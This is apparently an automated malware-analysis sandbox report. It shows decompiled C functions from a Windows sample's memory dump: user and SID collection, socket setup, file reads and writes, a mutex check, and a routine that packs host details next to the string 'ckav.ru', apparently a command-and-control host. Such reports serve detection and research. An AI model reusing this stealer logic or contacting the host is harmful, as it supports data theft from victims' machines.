Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				WCHAR* _v8;
				long _v12;
				void** _v16;
				WCHAR* _v20;
				long _v24;
				long _v28;
				union _SID_NAME_USE _v32;
				intOrPtr* _t25;
				WCHAR* _t27;
				WCHAR* _t30;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t40;
				long _t44;
				intOrPtr* _t45;
				WCHAR* _t46;
				void* _t48;
				WCHAR* _t49;
				WCHAR* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wmemset$AccountErrorInformationLastLookupToken
String ID: IDA$IDA
API String ID: 3235442692-2020647798
Opcode ID: 3ee1a1ce06ae12aacf5cd6fe5f49e6dcdcf2e4b1c886c14d3c46ece5f11b7a8b
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 3ee1a1ce06ae12aacf5cd6fe5f49e6dcdcf2e4b1c886c14d3c46ece5f11b7a8b
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 84d6954c35e95dea84778b2373911960d9f3888bdcbe7ff3b20ae9a495468b34
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 84d6954c35e95dea84778b2373911960d9f3888bdcbe7ff3b20ae9a495468b34
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10; // executed
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					_t31 = E004063B2(0, _t53, _t79); // executed
					E004058D4( *0x49fde0, _t31); // executed
					_t33 = E004060BD(_t79); // executed
					E004058D4( *0x49fde0, _t33); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e92
0x00412e9e
0x00412ea3
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
